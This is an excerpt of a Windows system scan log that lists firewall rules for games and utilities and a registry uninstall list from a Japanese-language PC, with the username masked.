"{20ED1154-74E2-40CC-B7BA-EB97A5629618}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound - unstable\win32\launcher\launcher.exe |
"{249E4784-37ED-41B7-9A0A-A7A1DB45CE77}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{28FE3C24-72B9-46EA-BFF8-DF1F5ED3A735}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{2B458094-E34E-4D61-A71E-00BF0AE09CC1}" = protocol=6 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"{2F7EA497-8A77-4E93-98FD-FAC3D04148EB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\fallout 3 goty\falloutlauncher.exe |
"{31519014-0E92-44F8-AA64-C071294ECE6C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound - unstable\win32\launcher\launcher.exe |
"{32F33D92-B564-45C8-9DBE-7C8415836E1E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3C94EE72-023D-4737-A164-BBF75A47C58F}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{3D407C13-6E56-4E73-BA26-F75998103B57}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi media\dmcdaemon.exe |
"{3F028649-AFB9-4646-A588-ECE4CDBAFA42}" = protocol=17 | dir=in | app=c:\program files (x86)\origin games\peggle deluxe\peggle.exe |
"{4058E48D-159B-43FF-888A-21A974202DA7}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{4212E55C-1F49-42D2-95E0-66D64EAE9533}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{4894A956-5C80-4DFE-8B64-CBE309B92B35}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{4DA813BA-4CFF-4628-9830-67F5E10C1C54}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi media\windowsupnpmv.exe |
"{4F07AEE6-9B16-49F9-ADF8-0D71668C1761}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{57805F11-9512-4DAB-A81B-9BE6AACEFB36}" = dir=in | app=c:\program files\nec\atermwrex\wrstexv.exe |
"{57C2D820-7AD0-453B-8285-8E58CDE25BFA}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{58C3630E-2864-42D8-9CA7-759BE2CA0CC8}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{5C7A5130-BB4B-4231-A9BB-3590E1B0B946}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{5CE10B12-55C2-4B77-B394-7D8EC65CB312}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{5EF58D62-07CF-43DC-B2F9-83C8FB06F8FD}" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"{5F734B32-22E0-447D-AC75-C2E648200B4D}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{613F8DC5-EB12-4E91-A5E4-87CF3526A7BA}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead season two\thewalkingdead2.exe |
"{64A04FF8-CBFD-4731-ADD8-CA6C933B48CF}" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{66FBD273-42FE-40DA-B13D-1A20274091C3}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{699E3024-C238-41CC-827A-4FC9C961A707}" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kaihoukun.exe |
"{702F3FF7-72F5-435C-BE21-FC5392564B35}" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"{706D024A-9987-43A7-99AB-A05AAC753B50}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{7859C098-852C-48C0-BE23-F43D5839153E}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\borderlands2.exe |
"{7BA1DE26-D030-427C-A352-2952D5607E9B}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{80BD62F0-062A-454E-BF77-3E33199DC286}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead season two\thewalkingdead2.exe |
"{84353309-3AD0-4710-A037-30439DFDCE60}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{89AA67F2-634A-4DC7-B707-43A456CF4EDB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{8D385D53-B418-4821-8628-F4A7EA23FD5D}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{8FB24DD1-C855-473B-848C-7BA7883EAB0B}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{919026AB-819B-4B75-9888-5C4DC4CC7B61}" = dir=in | app=c:\program files (x86)\google\chrome remote desktop\45.0.2454.17\remoting_host.exe |
"{ACD8571A-BF2F-4058-A9F1-13943D59DDB1}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{AE7613E1-4C01-4039-B13B-86BFF0A9C276}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{B116E981-05C0-4A0E-82B8-6D0DDDA1288A}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\windowsupnp.exe |
"{B4D2790B-E562-45A0-BE60-91C93F6B35D9}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{B8306C92-4748-41D2-AB0C-262657062264}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{BC8CE69F-0BAF-424D-BB8D-4FDEFD3A868B}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{C2476E67-6AC5-4E77-95A1-FD2ADA0179D1}" = protocol=6 | dir=in | app=c:\program files\logicool gaming software\lcore.exe |
"{C30F7B29-0F51-4EC9-BFA9-37019321A040}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\dmcdaemon.exe |
"{C4CEFC82-C662-4525-AF12-FAB2BB6F9228}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\borderlands2.exe |
"{C7059020-81C9-4E74-AEF0-8E9EDF4E9806}" = protocol=17 | dir=in | app=c:\program files (x86)\origin games\plants vs. zombies\plantsvszombies.exe |
"{C85F098F-9402-4F66-875C-0CA5B076D538}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{CC61CB80-59BA-4542-85A1-B3EB12CFF1CB}" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kaihoukun.exe |
"{CCD5F8D3-8A12-4A59-B88B-6686E01A1778}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\dmcdaemon.exe |
"{CDAA9BEA-00EE-4C1E-BA26-FAEABE1DB2C1}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{CF3AD123-298F-4886-BB82-F3E2013A1C72}" = protocol=6 | dir=out | app=system |
"{D03B648A-B646-4005-9A7D-E2E7FF4306C1}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{D0CB7808-C14F-49C3-B913-F57BBFE97E5C}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{D7AAB717-BF01-402E-BE6D-C2DF2B4DBD95}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\launcher.exe |
"{D98D8193-F51D-407C-9A96-BECC74FCD7A0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\fallout 3 goty\falloutlauncher.exe |
"{DA63143F-C1C6-4F41-ADDC-472CE1DAE4B5}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\launcher.exe |
"{DAC2F7B6-15E2-4F3F-9885-F258005816B3}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead\walkingdead101.exe |
"{DB115161-C0C4-44D5-AE20-D7B41920CF83}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi media\windowsupnpmv.exe |
"{DCE9B16C-52F0-4564-A3FF-13E3CA1588E7}" = dir=in | app=c:\program files (x86)\acer\clear.fi sdk20\movie\playmovie.exe |
"{DE42C99A-A557-4832-B6CB-ED94CE6293F0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{E173D6D7-8DE6-41A8-9193-1D75C20A5165}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{E5982946-BFB5-4FF1-9545-1BAE1F0DE885}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{E7AE6B6D-2758-40C4-A69A-3C34D4DDC784}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{E7C889B8-BD4C-406C-9593-BA6815008F3B}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{ED4DB8BE-CC4C-4401-B231-C54AA1A6E79B}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead\walkingdead101.exe |
"{F099F014-C084-4313-AD0C-99A89878448F}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{F2DAC660-E054-434C-9E37-F8811838E44F}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe |
"{F6F3A866-3400-4460-9EA5-7387C64E41DA}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{F7B313DC-E69C-4926-B00E-090EF96DE908}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{FACDEF2E-95C9-4748-9C1B-A56847C1A7AA}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{FCF081A5-7057-4828-9DF7-DCF0532531C8}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe |
"TCP Query User{03E0A93A-75D3-4D07-B56A-8D1D5621B62C}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{15BF7285-D723-4137-A4DA-F3E8758A28D8}C:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe |
"TCP Query User{19ACD1EB-17EC-48EF-8568-3879412A8204}C:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{1AC5579A-F8C6-4BE4-A75C-50DFB51F9E86}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"TCP Query User{2D50CDD8-DE87-4402-AFB0-475E91AEB8AD}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe" = protocol=6 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe |
"TCP Query User{30259703-476E-4A46-BE1F-93BE4F9C5493}C:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe |
"TCP Query User{36344264-B27E-44BC-912E-06EDC90FBEC1}C:\program files\bitcomet\bitcomet.exe" = protocol=6 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"TCP Query User{36758093-0557-4DB8-A097-21F6B1532EAC}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe |
"TCP Query User{56C87BDB-5E80-449B-8377-80374B9336AE}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"TCP Query User{589569A2-B291-44B7-BD03-3787836292FA}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{5CA9F08A-45F8-4751-A325-FD4209F8BCDF}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"TCP Query User{6138985F-CA2A-4116-B628-C250BE08336E}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"TCP Query User{629FB112-524A-460C-87E9-906B4CCE2909}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe" = protocol=6 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe |
"TCP Query User{67F51355-D537-4F23-91B2-1DCA58D912BB}C:\program files (x86)\java\jre7\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre7\bin\javaw.exe |
"TCP Query User{762E3EAE-63AA-4D9E-A77F-99B7C301EA5D}C:\games\world_of_warships\wowslauncher.exe" = protocol=6 | dir=in | app=c:\games\world_of_warships\wowslauncher.exe |
"TCP Query User{7A27CC62-4ADC-4E95-8ED7-6B480B1315AE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"TCP Query User{876FA58A-9F10-4143-9C6B-BD83F81376A5}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"TCP Query User{88416970-5870-4022-BD6A-B6DE1A78EBFE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe |
"TCP Query User{BEABC980-B2CF-42ED-B4C3-4CA46E6F05C1}C:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe |
"TCP Query User{D1ED5296-1DCC-44C5-AB27-D68D5B4F09EF}C:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe |
"TCP Query User{EB554B65-6A61-4FAD-A4BC-F0B939E040FA}C:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{018318F9-DF67-40B2-B424-9C661D7419FE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"UDP Query User{1328747C-7C9B-4134-8964-DCBB2619A560}C:\program files (x86)\java\jre7\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre7\bin\javaw.exe |
"UDP Query User{132BCC89-D067-40C0-BC20-DD1F16B255BA}C:\program files\bitcomet\bitcomet.exe" = protocol=17 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"UDP Query User{1A72E378-22B3-43DC-BBFF-50AF69099186}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"UDP Query User{3065D8C4-E99B-4EBE-B6BD-DA7ACB404D49}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{39AE53E5-AF58-4F3E-80F3-F5D726E68960}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe" = protocol=17 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe |
"UDP Query User{3A903891-3427-44B3-ADD0-E2CB19184471}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{3C3C7169-9B09-4DA1-9B08-E74739785925}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"UDP Query User{3E3BA15A-AF39-496E-A764-7BBBE4E0ECB4}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe |
"UDP Query User{4B1BD6FB-2C69-4084-ABB8-F86A6C8C4645}C:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe |
"UDP Query User{5F881E0B-86C0-432D-AF37-6049BC1B0A4C}C:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe |
"UDP Query User{7A45263F-5FDD-4BA4-B89B-C2CD41C4E249}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"UDP Query User{A80CF77E-8FA1-4F97-90B0-79875CB4CEC8}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"UDP Query User{B1523796-A8CA-4381-8327-272B8E56CBB0}C:\games\world_of_warships\wowslauncher.exe" = protocol=17 | dir=in | app=c:\games\world_of_warships\wowslauncher.exe |
"UDP Query User{D2430190-5C9B-4480-97FB-66FA6EA87CA4}C:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{D2DA33DD-74AB-4343-94BE-C4E6FEA54BE4}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe |
"UDP Query User{E1784312-92EB-4B19-9711-258E825B4166}C:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{E4A31AA7-7E4D-4D31-9D6F-EDC58BCA2644}C:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe |
"UDP Query User{EC1C77DA-0D2A-4208-A2B1-A79ED32F2898}C:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe |
"UDP Query User{EE5691C4-FCC6-4052-BE9D-11C8DD6473BB}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe" = protocol=17 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe |
"UDP Query User{FBC62EB4-E510-4E7C-AC51-3D8E89A74B86}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{07A13FD1-8688-4FBA-94E7-5A942B3533F2}" = DisplayLink Graphics
"{09536BA1-E498-4CC3-B834-D884A67D7E34}" = Intel® Trusted Connect Service Client
"{0B78ECB0-1A6B-4E6D-89D7-0E7CE77F0427}" = MyWinLocker
"{180C8888-50F1-426B-A9DC-AB83A1989C65}" = Windows Live Language Selector
"{1AAF6669-31B2-3840-9346-F0F653840FD1}" = Microsoft .NET Framework 4.5.1 (JPN)
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{1F557316-CFC0-41BD-AFF7-8BC49CE444D7}" = Shredder
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{26784146-6E05-3FF9-9335-786C7C0FB5BE}" = Microsoft .NET Framework 4.5.2
"{37B8F9C7-03FB-3253-8781-2517C99D7C00}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030
"{3BF2C0A8-2C44-4A36-AA96-3BD6FB7BB01F}" = Windows Live Remote Client Resources
"{4710662C-8204-4334-A977-B1AC9E547819}" = Broadcom Card Reader Driver Installer
"{54C5B89F-0A8C-4C07-A51D-7380974DA459}" = Windows Live Remote Service Resources
"{5D239A92-31A4-4FCA-967D-F9EA8E1FDF6A}" = iTunes
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{690285C2-2481-44FB-8402-162EA970A6DD}" = Logitech Gaming Software
"{6C9365EB-1F9E-4893-9196-3EC77C88D0C5}" = インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.2
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1041" = Microsoft .NET Framework 4.5.1 (日本語)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9B3B4129-220E-42C7-9C5B-91C65E0885B4}" = Apple Mobile Device Support
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B98C4542-1B4B-4483-8265-2951DF6966CD}" = DisplayLink Core Software
"{C91DCB72-F5BB-410D-A91A-314F5D1B4284}" = Broadcom NetLink Controller
"{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030
"{D7B824DE-DA32-4772-9E5E-39C5158136A7}" = Apple Application Support(64 ビット)
"{D9FCBAAE-DB72-488B-96D0-0AA3C892C0D6}" = Microsoft Security Client
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client
"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service
"Broadcom Wireless Utility" = Broadcom Wireless Utility
"CCleaner" = CCleaner
"Elantech" = ETDWare PS/2-X64 10.6.9.9_WHQL
"Explzh" = Explzh for Windows (64bit)
"Logitech Gaming Software" = Logicool ゲーム ソフトウェア 8.57
"Microsoft Security Client" = Microsoft Security Essentials

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{019EF473-6D0A-415C-9A2E-1AF5F66AC60F}" = Windows Live Messenger
"{0A3925EA-5B0E-401B-A189-7419149747B2}" = Adobe AIR
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0B61BBD5-DA3C-409A-8730-0C3DC3B0F270}" = Backup Manager V3
"{10AB1F40-BDEC-4A8D-B427-30F9429378B0}" = Windows Live Movie Maker
"{15D95497-8F76-41E5-8894-EDDB59E39BD9}" = Windows Live メール
"{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}" = MyWinLocker Suite
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{26A24AE4-039D-4CA4-87B4-2F83218060F0}" = Java 8 Update 60
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
"{39F15B50-A977-4CA6-B1C3-6A8724CDA025}" = MyWinLocker 4
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel(R) Rapid Storage Technology
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}" = Norton Online Backup
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{517E7DBD-7A5B-4B7F-B137-82AB4DAD68FC}" = LogMeIn Hamachi
"{51C7AD07-C3F6-4635-8E8A-231306D810FE}" = Cisco LEAP Module
"{59E4543A-D49D-4489-B445-473D763C79AF}" = Microsoft Games for Windows - LIVE Redistributable
"{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}" = Google Update Helper
"{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}" = Cisco EAP-FAST Module
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{675D8E1E-2388-4718-902C-E5FC4888AC0E}" = Windows Live Essentials
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6A0549A9-1B96-498C-ACBC-3943001FEB19}" = Skype(TM) 7.8
"{6C3F8916-D6A5-4A31-9DA8-80C973CE437F}" = Windows Live Writer
"{6D1221A9-17BF-4EC0-81F2-27D30EC30701}" = Skype Click to Call
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7134EF35-DA07-41F8-A71F-66709E194BB5}" = Windows Live Mesh
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79BF4901-1EC4-4726-B3C2-A7859706C6E7}" = League of Legends
"{7F811A54-5A09-4579-90E1-C93498E230D9}" = Acer eRecovery Management
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{88A686A9-D687-4295-B633-50D8A4B88371}" = Windows Live Writer Resources
"{8A66A2C8-0032-4949-8D99-C293A3EACF79}" = Windows Live Photo Common
"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime
"{8D59BE38-3A4F-4525-AD0D-8980E9E31EFA}" = Windows Live フォト ギャラリー
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{912422D4-0A22-4F70-BF8D-802B4BCD0999}" = Chrome Remote Desktop Host
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
